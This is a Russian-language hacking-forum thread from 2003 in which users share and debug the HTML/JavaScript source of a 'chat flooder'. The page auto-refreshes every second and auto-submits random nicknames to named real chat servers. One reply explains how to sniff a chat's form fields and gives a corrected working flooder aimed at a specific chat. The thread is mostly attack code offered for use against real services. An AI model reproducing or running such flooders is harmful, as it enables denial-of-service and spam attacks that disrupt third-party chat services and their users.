Чаты Chat flod

Discussion in 'Веб-уязвимости' started by Че Гевара, 26 Nov 2003.

  1. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    <HTML>
    <HEAD><TITLE>Chat Flooder</TITLE>
    <meta http-equiv="Refresh" content="1">
    < script Language="JavaScript">
    function submit() {
    Timer= setTimeout(" (document.chat_x.submit())",0);
    }
    </script>

    </HEAD>
    <BODY bgColor=#000066 onload="document.chat_x.nick.value=(Math.floor(Math.random()*1000000));submit()">
    <FORM action=http://chat.comlink.ru/enter/ method=post name="chat_x" target="send">
    <input name=color type=hidden value=red>
    Nick:<input name=nick type=text>
    <input name=password type=hidden value="">
    <INPUT type=submit value="Начать!!!">  
    </BODY></HTML>
    ...................................................................................
    http://chat.comlink.ru/enter
    Как вы поняли это исходник флудера для даннного чата.
    Почему же он не работает?
    Вы можете не подсказывать, только укажите на ошибку!!!
    Я уже замучился с этим...
    отправлять данные нужно http://chat.comlink.ru/enter/ или куда-нибудь в другое место?
     
  2. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Трудно ответить?
    Вы просто скажите, для простого(не знаю ,куда проще )чата,  http://www.rgb.holm.ru/cgi-bin/chat.cgi запустить флудер , куда указать action= ? если именно сюда, то флудер не запустится.
     
  3. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    action=http://www.rgb.holm.ru/cgi-bin/chat.cgi
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    А не работает потому, что все остальное неправильно.
    Или ты думаешь, что достаточно заменить action и все будет работать в любом чате [​IMG]
    Сначала нужно поставть себе отлавливаетль запросов (типа Naviscope), потом зайти в чат, в навископе посмотреть какие поля передаются в чат и по какому адресу, потом изменить поля флудера на такие, какие нужно, поставть правильный тип запроса, и только потом запускать флудер (если уж влом научится пользоваться InetCrack-ом).

    Короче для данного чата этот флудер должен выглядеть так:
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    <HTML>
    <HEAD><TITLE>Chat Flooder</TITLE>
    <meta http-equiv="Refresh" content="1">
    < script Language="JavaScript">
    function submit() {
    Timer= setTimeout(" (document.chat_x.submit())",0);
    }
    </script>

    </HEAD>
    <BODY bgColor=#000066 onload="document.chat_x.nick.value=(Math.floor(Math.random()*1000000));document.chat_x.submit()">
    <FORM action="http://www.rgb.holm.ru/cgi-bin/chat.cgi" method=get name="chat_x" target="send">
    <input name=color value=red>
    Nick:<input name=nick type=text>
    <INPUT name=action value="enter"> &nbsp;
    </BODY></HTML>
    [/QUOTE]<span id='postcolor'>
     
  5. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Да и кстати вот этот фрагмент
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    < script Language="JavaScript">
    function submit() {
    Timer= setTimeout(" (document.chat_x.submit())",0);
    }
    </script>
    [/QUOTE]<span id='postcolor'>

    вообще нафиг не нужен, его можно убить
     
  6. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ ноября 27 2003,16:28)</td></tr><tr><td id="QUOTE">[/QUOTE]<span id='postcolor'>
    спасибо. я понял.